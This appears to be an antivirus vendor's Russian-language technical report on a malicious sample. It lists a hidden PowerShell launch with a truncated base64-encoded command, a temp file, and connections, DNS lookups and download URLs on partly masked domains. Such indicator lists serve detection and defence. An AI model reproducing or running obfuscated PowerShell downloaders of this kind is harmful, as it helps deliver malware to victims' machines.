Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSADEAOQBiADQAaQA3AD0AKAAoACcAQwAnACsAJwA5AGQAOABzACcAKQArACcAMAA4ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAVQBTAEUAcgBwAFIAbwBGAGkATABlAFwAdQA1AEYAcwBVAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1952
- %TEMP%\821173.cvr
- 'eb#.no':80
- 'fr####senbach.de':80
- 'ge##tax.de':80
- 'ge####iasanchez.es':443
- 'fr###roller.de':80
- 'fr###roller.de':443
- 'fo###oule.de':80
- 'gm##006.de':80
- http://eb#.no/billett/VMs/
- http://fr####senbach.de/Meerbusch/igHfjN/
- http://ge##tax.de/assets/attach/rEzDDIkWAlZ/
- http://fr###roller.de/cgi-bin/attach/edFGzwpekjnwk/
- http://fo###oule.de/bba/file/TyfJoGH/
- http://gm##006.de/cgi-bin/file/fEyZ/
- 'fr###roller.de':443
- DNS ASK eb#.no
- DNS ASK fr####senbach.de
- DNS ASK ge##tax.de
- DNS ASK ge####iasanchez.es
- DNS ASK fr###roller.de
- DNS ASK fo###oule.de
- DNS ASK gm##006.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSADEAOQBiADQAaQA3AD0AKAAoACcAQwAnACsAJwA5AGQAOABzACcAKQArACcAMAA4ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAVQBTAEUAcgBwAFIAbwBGAGkATABlAFwAdQA1AEYAcwBVAH...' (со скрытым окном)